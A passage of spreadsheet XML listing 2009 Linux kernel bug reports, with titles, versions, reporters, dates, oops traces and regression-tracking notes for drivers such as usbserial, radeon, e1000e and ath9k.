    <t>I am using umtsmon to connect my Huawei-E169 to Internet. When connecting to an UMTS network everything works fine, however when connecting to a GPRS network (fallback, if no umts network available), I get the following Ooops: PPP generic driver version 2.4.2 PPP Deflate Compression module registered BUG: unable to handle kernel paging request at 6b6b6b87 IP: [&lt;f7cc3df9&gt;] serial_do_free+0x30/0x7b [usbserial] *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1c.2/0000:02:00.0/ieee80211/phy0/rfkill1/uevent Modules linked in: ppp_deflate zlib_deflate ppp_async crc_ccitt ppp_generic slhc fuse option usbserial usb_storage sunrpc ipv6 cpufreq_ondemand acpi_cpufreq dm_multipath uinput snd_hda_codec_si3054 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm arc4 ppdev btusb parport_pc ecb bluetooth firewire_ohci firewire_core iwl3945 sdhci_pci yenta_socket snd_timer iTCO_wdt sdhci snd parport rsrc_nonstatic crc_itu_t iTCO_vendor_support iwlcore mmc_core soundcore snd_page_alloc e1000e mac80211 toshiba_acpi cfg80211 joydev rfkill ata_generic pata_acpi i915 drm i2c_algo_bit i2c_core video output [last unloaded: microcode] Pid: 1472, comm: umtsmon Not tainted (2.6.31-0.118.rc5.fc12.i686 #1) Tecra A8 EIP: 0060:[&lt;f7cc3df9&gt;] EFLAGS: 00010286 CPU: 0 EIP is at serial_do_free+0x30/0x7b [usbserial] EAX: f259ca6c EBX: f63eca50 ECX: f7cc3e44 EDX: 6b6b6b6b ESI: f63eca88 EDI: 00000000 EBP: f15d3e84 ESP: f15d3e74 DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Process umtsmon (pid: 1472, ti=f15d2000 task=f1602b80 task.ti=f15d2000) Stack: ed87ae0e f259c860 f25872a0 00000000 f15d3ea0 f7cc3ed3 f15cc900 ed87ae0e &lt;0&gt; f25872a0 00000000 00000000 f15d3f34 c0679747 f15d3ee4 f25960b0 00000000 &lt;0&gt; 00000000 ed87ae0e 00000000 ed87ae0e f15d3ee4 c046ec0c 00000000 00000000 Call Trace: [&lt;f7cc3ed3&gt;] ? serial_close+0x8f/0xa8 [usbserial] [&lt;c0679747&gt;] ? tty_release_dev+0x16a/0x3fa [&lt;c046ec0c&gt;] ? mark_lock+0x29/0x1f6 [&lt;c045c7ba&gt;] ? autoremove_wake_function+0x0/0x55 [&lt;c04f524a&gt;] ? sys_close+0x35/0xc2 [&lt;c06799fc&gt;] ? tty_release+0x25/0x41 [&lt;c04f8a42&gt;] ? __fput+0x101/0x1a2 [&lt;c04f8b0a&gt;] ? fput+0x27/0x3a [&lt;c04f51fa&gt;] ? filp_close+0x64/0x7f [&lt;c04f5291&gt;] ? sys_close+0x7c/0xc2 [&lt;c0403a50&gt;] ? syscall_call+0x7/0xb Code: 53 83 ec 04 0f 1f 44 00 00 65 8b 15 14 00 00 00 89 55 f0 31 d2 80 b8 06 02 00 00 00 75 41 8b 18 05 0c 02 00 00 8b 53 04 8d 73 38 &lt;8b&gt; 7a 1c e8 14 03 9e c8 31 d2 89 f0 e8 54 80 b5 c8 f6 43 0c 01 EIP: [&lt;f7cc3df9&gt;] serial_do_free+0x30/0x7b [usbserial] SS:ESP 0068:f15d3e74 CR2: 000000006b6b6b87 ---[ end trace 6c0877bfb04cdcd3 ]--- Later when I disconnect the device from the USB port, I get another one: usb 2-1: USB disconnect, address 3 option: option_instat_callback: error -108 BUG: unable to handle kernel paging request at 6b6b6b6b IP: [&lt;c0600627&gt;] __list_add+0x38/0x79 *pde = 00000000 Oops: 0000 [#2] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1c.2/0000:02:00.0/ieee80211/phy0/rfkill1/uevent Modules linked in: ppp_deflate zlib_deflate ppp_async crc_ccitt ppp_generic slhc fuse option usbserial usb_storage sunrpc ipv6 cpufreq_ondemand acpi_cpufreq dm_multipath uinput snd_hda_codec_si3054 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm arc4 ppdev btusb parport_pc ecb bluetooth firewire_ohci firewire_core iwl3945 sdhci_pci yenta_socket snd_timer iTCO_wdt sdhci snd parport rsrc_nonstatic crc_itu_t iTCO_vendor_support iwlcore mmc_core soundcore snd_page_alloc e1000e mac80211 toshiba_acpi cfg80211 joydev rfkill ata_generic pata_acpi i915 drm i2c_algo_bit i2c_core video output [last unloaded: microcode] Pid: 26, comm: khubd Tainted: G D (2.6.31-0.118.rc5.fc12.i686 #1) Tecra A8 EIP: 0060:[&lt;c0600627&gt;] EFLAGS: 00010046 CPU: 1 EIP is at __list_add+0x38/0x79 EAX: 6b6b6b6b EBX: f6dd1db0 ECX: f63ecab0 EDX: 6b6b6b6b ESI: 6b6b6b6b EDI: f63ecab0 EBP: f6dd1d8c ESP: f6dd1d7c DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Process khubd (pid: 26, ti=f6dd0000 task=f6dc95c0 task.ti=f6dd0000) Stack: 95051394 f63eca88 f6dc95c0 f63eca8c f6dd1dd0 c081bb88 f6dd1da8 c046eff8 &lt;0&gt; f63ecab0 00000002 f7cc3f39 f63ecac4 00000202 f6dd1db0 f6dd1db0 11111111 &lt;0&gt; f6dd1db0 95051394 f63eca88 00000000 f63eca88 f6dd1de8 c081be9f f7cc3f39 Call Trace: [&lt;c081bb88&gt;] ? __mutex_lock_common+0x107/0x32b [&lt;c046eff8&gt;] ? trace_hardirqs_on_caller+0x26/0x155 [&lt;f7cc3f39&gt;] ? usb_serial_disconnect+0x4d/0x148 [usbserial] [&lt;c081be9f&gt;] ? mutex_lock_nested+0x41/0x5a [&lt;f7cc3f39&gt;] ? usb_serial_disconnect+0x4d/0x148 [usbserial] [&lt;f7cc3f39&gt;] ? usb_serial_disconnect+0x4d/0x148 [usbserial] [&lt;c06fbf61&gt;] ? usb_disable_interface+0x3e/0x5e [&lt;c06fef51&gt;] ? usb_unbind_interface+0x5e/0xe6 [&lt;c06a7f3d&gt;] ? __device_release_driver+0x5c/0xa6 [&lt;c06a8061&gt;] ? device_release_driver+0x2b/0x48 [&lt;c06a71ee&gt;] ? bus_remove_device+0xa3/0xdd [&lt;c06a5238&gt;] ? device_del+0x108/0x15b [&lt;c06fbe46&gt;] ? usb_disable_device+0xb6/0x193 [&lt;c06f62e0&gt;] ? usb_disconnect+0xd7/0x183 [&lt;c06f78df&gt;] ? hub_events+0x533/0xf0a [&lt;c06f82e4&gt;] ? hub_thread+0x2e/0x17e [&lt;c06f82e4&gt;] ? hub_thread+0x2e/0x17e [&lt;c045c7ba&gt;] ? autoremove_wake_function+0x0/0x55 [&lt;c06f82b6&gt;] ? hub_thread+0x0/0x17e [&lt;c045c464&gt;] ? kthread+0x76/0x7b [&lt;c045c3ee&gt;] ? kthread+0x0/0x7b [&lt;c040463f&gt;] ? kernel_thread_helper+0x7/0x10 Code: ec 04 65 a1 14 00 00 00 89 45 f0 31 c0 8b 41 04 39 d0 74 17 51 50 52 68 fe 29 95 c0 6a 1a 68 b3 29 95 c0 e8 41 3e e4 ff 83 c4 18 &lt;8b&gt; 06 39 f8 74 17 56 50 57 68 4b 2a 95 c0 6a 1e 68 b3 29 95 c0 EIP: [&lt;c0600627&gt;] __list_add+0x38/0x79 SS:ESP 0068:f6dd1d7c CR2: 000000006b6b6b6b ---[ end trace 6c0877bfb04cdcd4 ]---</t>
  </si>
  <si>
    <t>kernel crash with Oops: 0000 [#1] SMP, EIP is at rb_erase</t>
  </si>
  <si>
    <t>2.6.27.9</t>
  </si>
  <si>
    <t>2009-08-04 11:37 UTC</t>
  </si>
  <si>
    <t>vinklarek</t>
  </si>
  <si>
    <t>2012-06-13 14:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 22602 [details] full dmesg console output BUG: unable to handle kernel &lt;1&gt;BUG: unable to handle kernel NULL pointer dereference at 00000000 IP: [&lt;c01fa560&gt;] rb_erase+0x178/0x228 *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: cls_u32 sch_sfq sch_htb iptable_filter ip_tables 8021q garp stp llc iTCO_wdt ehci_hcd uhci_hcd iTCO_vendor_support i2c_i801 thermal e1000e button usbcore processor Pid: 0, comm: swapper Not tainted (2.6.27.9Core2-Xeon-kdump-reloc #1) EIP: 0060:[&lt;c01fa560&gt;] EFLAGS: 00010017 CPU: 2 EIP is at rb_erase+0x178/0x228 EAX: e2021fe0 EBX: e202c02c ECX: 00000000 EDX: e2021fe0 ESI: e202202c EDI: f78dfc68 EBP: f7889ed0 ESP: f7889ebc DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process swapper (pid: 0, ti=f7888000 task=f7886dd0 task.ti=f7888000) Stack: e2021fe0 00000001 f78dfc68 e2021fd8 00000002 f7889ee4 c01345bc c02b3328 f78dfc68 e2021fa0 f7889f04 c01347e2 00000000 e202200c f78dfc8c c0450114 00000001 c040ca1c f7889f0c c0134892 f7889f30 c0126964 c0452ac0 c0452ac0 Call Trace: [&lt;c01345bc&gt;] ? __remove_hrtimer+0x5f/0x67 [&lt;c02b3328&gt;] ? qdisc_watchdog+0x0/0x1c [&lt;c01347e2&gt;] ? run_hrtimer_pending+0x35/0xd0 [&lt;c0134892&gt;] ? run_hrtimer_softirq+0x15/0x17 [&lt;c0126964&gt;] ? __do_softirq+0x7b/0xf1 [&lt;c0126a14&gt;] ? do_softirq+0x3a/0x52 [&lt;c0126d07&gt;] ? irq_exit+0x44/0x79 [&lt;c010fec8&gt;] ? smp_apic_timer_interrupt+0x71/0x81 [&lt;c010433d&gt;] ? apic_timer_interrupt+0x2d/0x34 [&lt;c0109136&gt;] ? mwait_idle+0x39/0x43 [&lt;c01025b5&gt;] ? cpu_idle+0xd9/0xfe [&lt;c02ffcec&gt;] ? start_secondary+0x168/0x16d ======================= Code: ff 8b 4e 04 8b 06 8b 11 83 e0 01 83 e2 fe 09 d0 89 01 8b 41 04 83 0e 01 85 c0 74 03 83 08 01 8b 55 ec 89 f0 e8 8e fc ff ff eb 7b &lt;8b&gt; 01 a8 01 75 15 83 c8 01 89 01 89 f0 83 26 fe 8b 55 ec e8 c8 EIP: [&lt;c01fa560&gt;] rb_erase+0x178/0x228 SS:ESP 0068:f7889ebc distribution: Debian 5.0.2 machine usage: linux router running quagga/ospf</t>
  </si>
  <si>
    <t>2.6.31-rc5 with radeon KMS enabled fails to boot on X1300 Pro</t>
  </si>
  <si>
    <t>2009-08-04 16:55 UTC</t>
  </si>
  <si>
    <t>Adam Tkac</t>
  </si>
  <si>
    <t>2009-08-09 23:02 UTC</t>
  </si>
  <si>
    <t>2.6.31-rc5 fails to boot on the video card specified below (lspci output): 01:00.0 VGA compatible controller: ATI Technologies Inc RV516 [Radeon X1300/X1550 Series] 01:00.1 Display controller: ATI Technologies Inc RV516 [Radeon X1300 Pro] (Secondary) When machine is booting screen gets blank when normally "kernel output letters become smaller" - I think it is time when radeonfb code gets executed. I bisected revisions between 2.6.31-rc4 (fine) and 2.6.31-rc5 (bad) and the first bad revision is: commit 7a50f01a4ab89d5c05eb2cf62e206ac0bfc61d2c Author: Dave Airlie &lt;airlied@redhat.com&gt; Date: Tue Jul 21 20:39:30 2009 +1000 drm/radeon/kms: vram sizing on certain r100 chips needs workaround. Note that current master (a33a052f19a21d727847391c8c1aff3fb221c472) doesn't work as well. Feel free to ask me for more details if needed.</t>
  </si>
  <si>
    <t>e1000e reports invalid NVM Checksum on 82566DM-2 (bisected)</t>
  </si>
  <si>
    <t>2009-08-04 18:06 UTC</t>
  </si>
  <si>
    <t>jsbronder</t>
  </si>
  <si>
    <t>2009-08-19 23:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.31-rc2 Earliest failing kernel version: 2.6.31-rc3 Distribution: Gentoo As of commit 28c9195a570a32de2760310ca278d44a4fd060a4, the e1000e driver is reporting an invalid NVM Checksum on an 82566 two port Gig-E network adapter. Ring buffer: [ 644.732977] e1000e: Intel(R) PRO/1000 Network Driver - 1.0.2-k2 [ 644.732980] e1000e: Copyright (c) 1999-2008 Intel Corporation. [ 644.733031] e1000e 0000:00:19.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 644.733040] e1000e 0000:00:19.0: setting latency timer to 64 [ 644.733132] e1000e 0000:00:19.0: irq 51 for MSI/MSI-X [ 644.780841] 0000:00:19.0: 0000:00:19.0: The NVM Checksum Is Not Valid [ 644.801115] e1000e 0000:00:19.0: PCI INT A disabled [ 644.801126] e1000e: probe of 0000:00:19.0 failed with error -5 lspci -vv (kernel 28c915^) 00:19.0 Ethernet controller: Intel Corporation 82566DM-2 Gigabit Network Connection (rev 02) Subsystem: Super Micro Computer Inc Device 10bd Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 51 Region 0: Memory at c3500000 (32-bit, non-prefetchable) [size=128K] Region 1: Memory at c3521000 (32-bit, non-prefetchable) [size=4K] Region 2: I/O ports at 1820 [size=32] Capabilities: [c8] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable+ Address: 00000000fee0f00c Data: 4199 Capabilities: [e0] PCIe advanced features &lt;?&gt; Kernel driver in use: e1000e Kernel modules: e1000e</t>
  </si>
  <si>
    <t>MMC/SD card reader wont work on kernels higher than 2.6.24.x</t>
  </si>
  <si>
    <t>higher than 2.6.24.x</t>
  </si>
  <si>
    <t>2009-08-05 17:32 UTC</t>
  </si>
  <si>
    <t>Krystian Juskowiak</t>
  </si>
  <si>
    <t>2012-06-13 14:38 UTC</t>
  </si>
  <si>
    <t>My card reader stop reading cards on kernels higher than 2.6.24.x. Log from lsusb about card reader: "Bus 006 Device 002: ID 05e3:070e Genesys Logic, Inc. X-PRO CR20xA USB 2.0 Internal Card Reader"</t>
  </si>
  <si>
    <t>Kernel Panic ieee80211_agg_splice_packets with Atheros AR9160 in Wireless N AP mode</t>
  </si>
  <si>
    <t>2.6.28 onwards with compat-wireless installed</t>
  </si>
  <si>
    <t>2009-08-05 18:44 UTC</t>
  </si>
  <si>
    <t>Jack Lau</t>
  </si>
  <si>
    <t>2009-08-12 17:04 UTC</t>
  </si>
  <si>
    <t>I have recently assembled a Linux server and router (no GUI) where I am using an Atheros AR9160 controller (Sparklan WMIA-268N) as an access point. I am using Ubuntu 9.04 jaunty release (default kernel 2.6.28-14-generic) but using hostapd 0.69 from the upcoming 9.10 karmic release because the one that comes with jaunty does not support nl80211. The problem is that I am constantly getting kernel panics, each time of the same error kernel panic ieee80211_agg_splice_packets. I have also tried many compat-wireless releases including 2.6.31-rc*, daily builds and many other kernels including 2.6.31-* all to no avail, even the latest one doesn't fix the problem. My easiest way to reproduce the problem is to surf the web using my Windows notebook, turn wifi off using the button so that it is suddenly disconnected without de-authenticating (turning wifi off whilst the wifi light is still blinking increases the chance of this crash), turning wifi back on and then surfing the web and this kernel panic comes just about every time. The notebook is fitted with an Intel 4965AGN in 802.11n mode where I have used both XP and Vista. I have started reporting the bug in the mailing list over 2 weeks ago so there will be many copies of log files saved over there at http://marc.info/?t=124863015500005&amp;r=1&amp;w=2 where there is quite a lot of information of what I have done. I also enclose the hostapd configuration file, an Ubuntu network configuration file, initial photos of the crash, many log files from hostapd, mac80211, ath9k and kernel panics. The logs were taken at different times, different kernels, different configurations, different debug setups, etc. Please note that although I am into Linux, I am very weak at programming. I am not very good at explaining things so if you need more information, please reply but please explain things clearly as I don't always understand things when they are not so clear.</t>
  </si>
  <si>
    <t>kernel oops when trying to use gigabyte u8000 dvb dongle</t>
  </si>
  <si>
    <t>2.6.31-5</t>
  </si>
  <si>
    <t>2009-08-06 19:21 UTC</t>
  </si>
  <si>
    <t>Tarvo</t>
  </si>
  <si>
    <t>2012-06-13 14:41 UTC</t>
  </si>
  <si>
    <t>works in 2.6.30 in 2.6.31rc5: [ 421.836106] usb 1-2: new high speed USB device using ehci_hcd and address 4 [ 421.969067] usb 1-2: configuration #1 chosen from 1 choice [ 422.056455] dib0700: loaded with support for 9 different device-types [ 422.056705] dvb-usb: found a 'Gigabyte U8000-RH' in cold state, will try to load a firmware [ 422.056716] usb 1-2: firmware: requesting dvb-usb-dib0700-1.20.fw [ 422.069993] dvb-usb: downloading firmware from file 'dvb-usb-dib0700-1.20.fw' [ 422.272921] dib0700: firmware started successfully. [ 422.776096] dvb-usb: found a 'Gigabyte U8000-RH' in warm state. [ 422.776193] dvb-usb: will pass the complete MPEG2 transport stream to the software demuxer. [ 422.776477] DVB: registering new adapter (Gigabyte U8000-RH) [ 423.013923] DVB: registering adapter 0 frontend 0 (DiBcom 7000PC)... [ 423.038008] xc2028 3-0061: creating new instance [ 423.038017] xc2028 3-0061: type set to XCeive xc2028/xc3028 tuner [ 423.038187] input: IR-receiver inside an USB DVB receiver as /devices/pci0000:00/0000:00:1d.7/usb1/1-2/input/input12 [ 423.038277] dvb-usb: schedule remote query interval to 50 msecs. [ 423.038286] dvb-usb: Gigabyte U8000-RH successfully initialized and connected. [ 423.038473] usbcore: registered new interface driver dvb_usb_dib0700 [ 448.945812] BUG: unable to handle kernel NULL pointer dereference at 00000008 [ 448.945827] IP: [&lt;c03a0813&gt;] _request_firmware+0x1f3/0x250 [ 448.945844] *pde = 34b09067 *pte = 00000000 [ 448.945852] Oops: 0000 [#1] SMP [ 448.945860] last sysfs file: /sys/devices/pci0000:00/0000:00:1c.2/0000:01:00.0/ieee80211/phy0/rfkill1/state [ 448.945868] Modules linked in: tuner_xc2028 dvb_usb_dib0700 dib7000p dib7000m dvb_usb dvb_core dib3000mc dibx000_common dib0070 nls_iso8859_1 nls_cp437 vfat fat xt_limit xt_tcpudp ipt_LOG ipt_MASQUERADE xt_DSCP ipt_REJECT nf_conntrack_irc nf_conntrack_ftp xt_state binfmt_misc ppdev lp parport joydev iptable_nat nf_nat nf_conntrack_ipv4 arc4 nf_conntrack nf_defrag_ipv4 ecb iptable_mangle iptable_filter snd_hda_codec_realtek ip_tables x_tables snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event ath5k snd_seq snd_timer snd_seq_device psmouse mac80211 led_class serio_raw uvcvideo pcspkr snd soundcore videodev ath v4l1_compat snd_page_alloc atl2 cfg80211 eeepc_laptop usb_storage fbcon tileblit font bitblit softcursor i915 drm i2c_algo_bit video output intel_agp agpgart [ 448.945999] [ 448.946007] Pid: 3533, comm: kdvb-ad-0-fe-0 Not tainted (2.6.31-5-generic #24-Ubuntu) 900 [ 448.946014] EIP: 0060:[&lt;c03a0813&gt;] EFLAGS: 00010202 CPU: 0 [ 448.946021] EIP is at _request_firmware+0x1f3/0x250 [ 448.946026] EAX: 00000000 EBX: f493eb60 ECX: 00000001 EDX: c06fee50 [ 448.946032] ESI: c0710538 EDI: eb95c6b8 EBP: ebb9fd30 ESP: ebb9fcfc [ 448.946038] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 448.946044] Process kdvb-ad-0-fe-0 (pid: 3533, ti=ebb9e000 task=f4ac9920 task.ti=ebb9e000) [ 448.946049] Stack: [ 448.946053] 80000400 f2d2bc00 000000c0 03400000 00000006 ebb9fd69 00000006 00000000 [ 448.946066] &lt;0&gt; ebb9fd94 f8f67062 eb9f3380 00000000 00000008 ebb9fd3c c03a0912 00000001 [ 448.946081] &lt;0&gt; ebb9fdcc f90bb730 ebb9fe78 f8f6785b 00000002 00000002 f4a826a8 f4a82000 [ 448.946096] Call Trace: [ 448.946112] [&lt;f8f67062&gt;] ? dib0700_ctrl_wr+0x52/0x70 [dvb_usb_dib0700] [ 448.946120] [&lt;c03a0912&gt;] ? request_firmware+0x12/0x20 [ 448.946132] [&lt;f90bb730&gt;] ? load_all_firmwares+0x60/0x6b0 [tuner_xc2028] [ 448.946144] [&lt;f8f6785b&gt;] ? dib0700_i2c_xfer_legacy+0x17b/0x1a0 [dvb_usb_dib0700] [ 448.946156] [&lt;f8f67062&gt;] ? dib0700_ctrl_wr+0x52/0x70 [dvb_usb_dib0700] [ 448.946168] [&lt;f8f6785b&gt;] ? dib0700_i2c_xfer_legacy+0x17b/0x1a0 [dvb_usb_dib0700] [ 448.946179] [&lt;f90bc67b&gt;] ? check_firmware+0x45b/0x870 [tuner_xc2028] [ 448.946191] [&lt;c013617d&gt;] ? update_curr+0x21d/0x230 [ 448.946202] [&lt;c030cfc4&gt;] ? rb_erase+0xb4/0x120 [ 448.946212] [&lt;f90bcaf5&gt;] ? generic_set_freq+0x65/0x500 [tuner_xc2028] [ 448.946221] [&lt;c0124e69&gt;] ? vmalloc_fault+0xc9/0xd0 [ 448.946231] [&lt;c056de65&gt;] ? do_page_fault+0x295/0x380 [ 448.946241] [&lt;c0431d34&gt;] ? i2c_transfer+0x94/0xc0 [ 448.946249] [&lt;c056dbd0&gt;] ? do_page_fault+0x0/0x380 [ 448.946259] [&lt;f90bd265&gt;] ? xc2028_set_params+0x185/0x276 [tuner_xc2028] [ 448.946267] [&lt;c05600d8&gt;] ? vsc_sata_init_one+0xba/0x268 [ 448.946279] [&lt;f8f5229b&gt;] ? dib7000p_set_frontend+0x4b/0x170 [dib7000p] [ 448.946290] [&lt;c014ae25&gt;] ? try_to_del_timer_sync+0x45/0x50 [ 448.946313] [&lt;f8f18a31&gt;] ? dvb_frontend_swzigzag_autotune+0x111/0x260 [dvb_core] [ 448.946321] [&lt;c0136fb7&gt;] ? try_to_wake_up+0xf7/0x350 [ 448.946329] [&lt;c056b823&gt;] ? _spin_lock_irq+0x13/0x20 [ 448.946348] [&lt;f8f195f1&gt;] ? dvb_frontend_swzigzag+0x1d1/0x260 [dvb_core] [ 448.946367] [&lt;f8f19ff7&gt;] ? dvb_frontend_thread+0x387/0x630 [dvb_core] [ 448.946376] [&lt;c01568b0&gt;] ? autoremove_wake_function+0x0/0x40 [ 448.946394] [&lt;f8f19c70&gt;] ? dvb_frontend_thread+0x0/0x630 [dvb_core] [ 448.946401] [&lt;c01565c4&gt;] ? kthread+0x74/0x80 [ 448.946408] [&lt;c0156550&gt;] ? kthread+0x0/0x80 [ 448.946418] [&lt;c0103f17&gt;] ? kernel_thread_helper+0x7/0x10 [ 448.946422] Code: 00 00 00 c7 44 24 04 d0 80 00 00 89 fa 89 34 24 ff 55 e0 83 45 e4 04 8b 45 e4 8b 00 85 c0 89 45 e0 75 d6 e9 52 fe ff ff 8b 45 e8 &lt;8b&gt; 70 08 e8 65 69 ff ff 89 5c 24 0c 89 74 24 08 89 44 24 04 c7 [ 448.946499] EIP: [&lt;c03a0813&gt;] _request_firmware+0x1f3/0x250 SS:ESP 0068:ebb9fcfc [ 448.946510] CR2: 0000000000000008 [ 448.946517] ---[ end trace f0d1f35290b71dab ]---</t>
  </si>
  <si>
    <t>second resume after s2ram fails</t>
  </si>
  <si>
    <t>2009-08-07 11:43 UTC</t>
  </si>
  <si>
    <t>Can Koy</t>
  </si>
  <si>
    <t>2010-07-07 02:50 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 5715Z notebook, BIOS v1.45 (latest), kernel 2.6.30.4 w/o any closed source drivers; suspends and resumes once but does not resume after the second suspend. After a brief HD activity, everything seems be dead; no reaction to CapsLock/Numlock, screen off, etc.</t>
  </si>
  <si>
    <t>System lockup on dual Pentium-3 with kernel 2.6.30</t>
  </si>
  <si>
    <t>2.6.30.4</t>
  </si>
  <si>
    <t>2009-08-08 13:16 UTC</t>
  </si>
  <si>
    <t>Martin Rogge</t>
  </si>
  <si>
    <t>2009-09-11 16:15 UTC</t>
  </si>
  <si>
    <t>13945 13982 13991</t>
  </si>
  <si>
    <t>Created attachment 22637 [details] uname -a After upgrade to 2.6.30 my machine locks up cold within a number of hours (TTL ranges from minutes to days). The mainboard is an MSI-9105 with dual P-3 1400Mhz. On the LKML similar cases have been reported for dual P2s and dual P3s. Further system details have been attached.</t>
  </si>
  <si>
    <t>cannot unmute sound by press mute button on Thinkpad T500</t>
  </si>
  <si>
    <t>2.6.31-5-generic</t>
  </si>
  <si>
    <t>2009-08-08 20:21 UTC</t>
  </si>
  <si>
    <t>Pavol Klačanský</t>
  </si>
  <si>
    <t>2010-09-06 21:43 UTC</t>
  </si>
  <si>
    <t>/proc/acpi/ibm/volume status unmuted: level: 7 mute: off commands: up, down, mute commands: level &lt;level&gt; (&lt;level&gt; is 0-15) mute buttond pressed: level: 7 mute: on commands: up, down, mute commands: level &lt;level&gt; (&lt;level&gt; is 0-15) mute button pressed again (does not change to mute: off, but volume up/down change it to off): level: 7 mute: on commands: up, down, mute commands: level &lt;level&gt; (&lt;level&gt; is 0-15) xev - no event showkey - no event kernel logs - no entry workaround is add "acpi_osi=Linux" to boot parameters I think, button could generate some event</t>
  </si>
  <si>
    <t>2.6.31-rcX breaks Apple MightyMouse (Bluetooth version)</t>
  </si>
  <si>
    <t>2009-08-08 22:08 UTC</t>
  </si>
  <si>
    <t>2009-10-02 17:14 UTC</t>
  </si>
  <si>
    <t>I've just discovered that my MightyMouse refuses to work on Linux 2.6.31-rc5 (also tested with rc3) The mouse works again on 2.6.31-rcX after removing this patch: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=fa047e4f6fa63a6e9d0ae4d7749538830d14a343</t>
  </si>
  <si>
    <t>2.6.31-rc1 - iwlagn and sky2 stopped working when ACPI enabled - Toshiba U400-17b, Acer Aspire 8935G</t>
  </si>
  <si>
    <t>2009-08-09 21:31 UTC</t>
  </si>
  <si>
    <t>2011-08-18 21:52 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in ACPI in 2.6.31-rc5 Submitter : Ricardo Jorge da Fonseca Marques Ferreira &lt;storm@sys49152.net&gt; Date : 2009-08-07 22:33 References : http://marc.info/?l=linux-kernel&amp;m=124968457731107&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Troubles with AoE and uninitialized object</t>
  </si>
  <si>
    <t>2009-08-09 21:45 UTC</t>
  </si>
  <si>
    <t>2009-10-07 21:32 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31-rc5 regression] Troubles with AoE and uninitialized object Submitter : Bruno Prémont &lt;bonbons@linux-vserver.org&gt; Date : 2009-08-04 10:12 References : http://marc.info/?l=linux-kernel&amp;m=124938117104811&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>MD raid regression</t>
  </si>
  <si>
    <t>2.6.31-rc5-git2</t>
  </si>
  <si>
    <t>2009-08-09 21:55 UTC</t>
  </si>
  <si>
    <t>2009-08-19 22:48 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc5-git2 MD raid regression Submitter : Mike Snitzer &lt;snitzer@redhat.com&gt; Date : 2009-08-05 15:06 References : http://marc.info/?l=linux-kernel&amp;m=124948481218857&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit 449aad3e25358812c43afc60918c5ad3819488e7 Author: NeilBrown &lt;neilb@suse.de&gt; Date: Mon Aug 3 10:59:58 2009 +1000 md: Use revalidate_disk to effect changes in size of device. First-Bad-Commit : 449aad3e25358812c43afc60918c5ad3819488e7</t>
  </si>
  <si>
    <t>x86 MCE malfunction on Thinkpad T42p</t>
  </si>
  <si>
    <t>2009-08-09 22:18 UTC</t>
  </si>
  <si>
    <t>2009-08-20 21:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc5 regression: x86 MCE malfunction on Thinkpad T42p Submitter : Johannes Stezenbach &lt;js@sig21.net&gt; Date : 2009-08-07 17:09 References : http://marc.info/?l=linux-kernel&amp;m=124966500232399&amp;w=4 Handled-By : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/37908/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Libertas: Association request to the driver failed</t>
  </si>
  <si>
    <t>2009-08-09 22:30 UTC</t>
  </si>
  <si>
    <t>2009-10-01 22:52 UTC</t>
  </si>
  <si>
    <t>Subject : Libertas: Association request to the driver failed Submitter : Daniel Mack &lt;daniel@caiaq.de&gt; Date : 2009-08-07 19:11 References : http://marc.info/?l=linux-kernel&amp;m=124967234311481&amp;w=4 Handled-By : Roel Kluin &lt;roel.kluin@gmail.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 57921c312e8cef72ba35a4cfe870b376da0b1b87 Author: Roel Kluin &lt;roel.kluin@gmail.com&gt; Date: Tue Jul 28 12:05:00 2009 +0200 libertas: Read buffer overflow Signed-off-by: Roel Kluin &lt;roel.kluin@gmail.com&gt; Signed-off-by: John W. Linville &lt;linville@tuxdriver.com&gt; First-Bad-Commit : 57921c312e8cef72ba35a4cfe870b376da0b1b87</t>
  </si>
  <si>
    <t>ath5k broken after suspend-to-ram</t>
  </si>
  <si>
    <t>2009-08-09 22:38 UTC</t>
  </si>
  <si>
    <t>2009-10-12 21:23 UTC</t>
  </si>
  <si>
